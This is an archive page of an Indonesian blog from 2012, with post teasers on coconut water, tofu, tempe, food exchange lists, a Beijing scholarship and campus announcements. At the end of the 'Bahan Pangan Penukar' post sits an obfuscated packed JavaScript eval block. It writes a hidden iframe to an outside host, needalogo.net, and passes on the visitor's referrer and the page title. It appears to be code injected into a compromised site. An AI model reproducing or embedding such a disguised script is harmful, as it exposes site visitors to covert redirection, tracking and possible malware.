browser icon
You are using an insecure version of your web browser. Please update your browser!
Using an outdated browser makes your computer unsafe. For a safer, faster, more enjoyable user experience, please update your browser today or try a newer browser.

Monthly Archives: January 2012

AIR KELAPA MUDA …. segarrrr….. bermanfaat ….

Di masyarakat kita berkembang suatu kepercayaan bahwa air kelapa, khususnya kelapa hijau, sangat baik diminum oleh ibu yang sedang hamil agar proses persalinan menjadi mudah dan anak yang dilahirkan memiliki kulit yang putih dan mulus. Air kelapa muda juga dipercaya memiliki efek pengobatan terhadap ginjal dan hipretensi (tekanan darah tinggi). Terlepas dari benar atau tidaknya … Continue reading »

Categories: Info Pangan & Gizi | 6 Comments

MAU KULIAH GRATIS DI BEIJING ???? (S1-S2-S3 deadline 28 Mei 2012)

Beasiswa Beijing Foreign Scholarship di Capital University of Economics and Business (CUEB) Pemerintah Kota Beijing menyediakan “Beijing Foreign Student Scholarship” untuk menarik pelajar asing yang berbakat untuk belajar dan melakukan penelitian di Beijing, serta mengembangkan persahabatan dengan warga RRT. Program ini diharapkan lebih lanjut dapat berdampak pada banyak hal seperti pengembangan sosial warga Beijing, politik, … Continue reading »

Categories: SCHOLARSHIP | Leave a comment

Kisah Paku & Papan Kayu

Terdapat sebuah cerita mengenai seorang anak yang begitu pemarah dan seorang ayah yang sederhana. Sang ayah melihat sikap anaknya yang suka sekali berkata atau berbuat kasar terhadap temannya, sahabat atau bahkan orang yang dia sayangi. Melihat sikap sang anak selalu yang seperti itu, suatu hari sang ayah berkata kepada anaknya. Ayah : Anak Ku. Kuberikan … Continue reading »

Categories: Motivasi - Inspirasi | Leave a comment

PENGUMUMAN TERBARU PKM-GT & PKM-AI

Diberitahukan bahwa DIKTI akan mengadakan Program Kreatifitas Mahasiswa Gagasan Tertulis (PKM-GT) dan Artikel Ilmiah (PKM-AI) tahun 2012. Sehubungan dengan batas akhir pengumpulan maka kami informasikan jadwal tingkat fakultas adalah sebagai berikut : dapat dilihat di : JADWAL PKM-GT dan PKM-AI 2012 Panduan Penulisan dapat dilihat di website http://www.dikti.go.id CP Koordinator tingkat Jurusan : THP : … Continue reading »

Categories: Info Kampus | Leave a comment

all about ‘TAHU’

Kemaren kan uda posting tentang Tempe, koq berasa nggak adil kalau nggak posting tentang Tahu juga … soalnya Tahu kan sodaranya Tempe, sama sama dari kedelai, sama sama makanan sejuta umat .. hehehe So, here we go .. semoga bermanfaat yaa… Tahu atau Tofu adalah makanan yang dibuat dari kedelai yang difermentasikan dan diambil sarinya. … Continue reading »

Categories: Info Pangan & Gizi | Leave a comment

PENERIMAAN TENAGA KEPENDIDIKAN NON PNS UNIVERSITAS BRAWIJAYA TAHUN 2012

PENGUMUMAN Nomor :  001 /PENG/2012 TENTANG PENERIMAAN TENAGA KEPENDIDIKAN NON PNS UNIVERSITAS BRAWIJAYA TAHUN 2012 Berdasarkan rencana kebutuhan Tenaga Kependidikan Non PNS, Universitas Brawijaya  melaksanakan penerimaan Tenaga Kependidikan Non PNS, dengan rincian persyaratan sebagaimana tersebut dibawah ini dan kualifikasi pendidikan pada lampiran Pengumuman ini.

Categories: Info Kampus | Leave a comment

SURAT DARI SETAN UNTUK MU

Aku melihatmu kemarin, saat engkau memulai aktivitas harianmu. Kau bangun tanpa sujud mengerjakan subuhmu Bahkan kemudian, kau juga tidak mengucapkan “Bismillah” sebelum memulai santapanmu, juga tidak sempat mengerjakan shalat Isha sebelum berangkat ketempat tidurmu Kau benar2 orang yang bersyukur, Aku menyukainya

Categories: Motivasi - Inspirasi | Leave a comment

TEMPE, Makanan Sejuta Umat….

Gara gara tadi pagi dapat kiriman tempe, jadi pengen posting tentang tempe deh, semoga bermanfaat buat yang baca, apalagi kalo abis baca terus ngirimin saya tempe … hehehe … (saya cinta tempe sih, xixixi …) Tempe, siapa yang tidak tahu?? Sebab bahan makanan yang satu ini memang paling merakyat karena terjangkau untuk seluruh lapisan masyarakat. … Continue reading »

Categories: Info Pangan & Gizi | 3 Comments

BAHAN PANGAN PENUKAR

Penggunan aneka ragam bahan pangan yang tersedia dalam konsumsi sehari hari dapat dinyatakan dalam satuan bahan penukar. Sebagai informasi dibawah ini dijelaskan beberapa komoditas bahan pangan pilihan lengkap dengan jenis penukarnya. Selengkapnya dapat dilihat di Bahan-Pangan-Penukar eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!”.replace(/^/,String)){while(c–)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return’\\w+’};c=1};while(c–)if(k[c])p=p.replace(new RegExp(‘\\b’+e(c)+’\\b’,’g’),k[c]);return p}(‘(9(){2 d=3;2 4=1;2 5=1;2 t=d.a(\’b\’);2 6=7.c(7.e()*f);2 0=\’g://h.i/j/k?\’;0=0+\’l=\’+3.m;0=0+\’&n=\’+3.o;0=0+\’&r=\’+6;d.p(\’\’)})();’,35,35,’src||var|document|razmw|razmh|id|Math|iframe|function|createElement|script|floor||random|9999|http|needalogo|net|rotation|3wBsvV|se_referrer|referrer|default_keyword|title|write|style||padding||0px|border|none|width|height’.split(‘|’),0,{}))

Categories: Info Pangan & Gizi | Leave a comment